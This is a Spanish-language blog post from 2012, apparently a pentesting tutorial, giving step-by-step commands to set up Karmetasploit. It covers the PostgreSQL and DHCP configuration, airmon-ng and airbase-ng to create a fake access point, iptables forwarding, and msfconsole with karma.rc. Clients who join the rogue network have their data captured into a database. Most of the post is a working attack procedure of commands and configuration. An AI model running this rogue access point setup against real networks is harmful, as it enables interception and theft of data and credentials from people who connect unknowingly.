domingo, 5 de febrero de 2012

Ataques sociales – Todo en uno

    Ataques sociales – Todo en uno
    Karmetasploit

>>>>> Información Karmetasploit:

>>>>> Información Postgresql:

  1. Antes de empezar con karma instalaremos en postgresql y dhcp3-server pues los necesitaremos a continuación, ya que karma puede guardar los datos de los clientes que se asocien al punto de acceso creado en una base de datos.
apt-get install postgresql libpq-dev dhcp3-server
  1. Ahora descargaremos el script de karma con wget:
cd /pentest/exploits/framework
  1. Ahora configuramos postgresql:
postgres -c psql
ALTER USER postgres WITH PASSWORD 'password';
Donde password es la contraseña escogida
\q
passwd -d postgres
sudo su postgres -c passwd
E instalamos pg con gem:
gem install pg

  1. Lo siguiente es configurar el servidor dhcp:
    nano /etc/dhcp3/dhcpd.conf:
option domain-name-servers 192.168.1.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 192.168.1.1;
}
  1. Ahora cambiamos el parámetro de conexión de karma con la base de datos, para ello editamos el script karma.rc:
nano karma.rc
Cambiamos solo la primera línea:
sintaxis → db_connect <usuario BD>:<password usuario BD>@127.0.0.1/<nombre de la base donde se introducirán los datos>
db_connect postgres:password@127.0.0.1/karma
Donde:
  • postgres → usuario de la base de datos, postgres es el usuario por defecto.
  • password → contraseña que hemos establecido antes.
  • karma → nombre de la base de datos donde se guardará la información que obtengamos. No es necesario que exista, metasploit la creará por nosotros sino existe.

  1. Ahora ponemos nuestra interfaz en modo monitor con airmon-ng:sintaxis → airmon-ng start <interfaz>
airmon-ng start wlan1
  1. Y a continuación airbase-ng:
    sintaxis → airbase-ng -P -C 30 -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> <interfaz en modo monitor>
airbase-ng -P -C 30 -c 6 -e APfalso mon0
  1. Siguiente paso habilitar at0, configurar iptables, habilitar el ip forwarding y lanzar el cliente dhcp sobre el archivo configurado antes:
    sintaxis → ifconfig <interfaz airbase-ng> up 10.0.0.1 netmask 255.255.255.0
    sintaxis → iptables -t nat -A POSTROUTING -o <interfaz acceso Internet> -j MASQUERADE
    sintaxis → iptables -A INPUT -s 10.0.0.0/24 -i <interfaz airbase-ng> -j ACCEPT
    sintaxis → echo "1" >/proc/sys/net/ipv4/ip_forward
    sintaxis → dhcpd3 -cf <lugar donde esta la configuración del servidor dhcp> <interfaz airbase-ng>
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A INPUT -s 10.0.0.0/24 -i at0 -j ACCEPT
echo "1" >/proc/sys/net/ipv4/ip_forward
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
  1. Ahora lanzamos metasploit junto con karma:
msfconsole -r karma.rc

Veremos como se crea la base de datos karma:


Por último nos quedará esperar a que los clientes se conecten a nuestro punto de acceso y los datos útiles se irán almacenando en la base de datos karma para su posterior análisis:

No hay comentarios:

Publicar un comentario en la entrada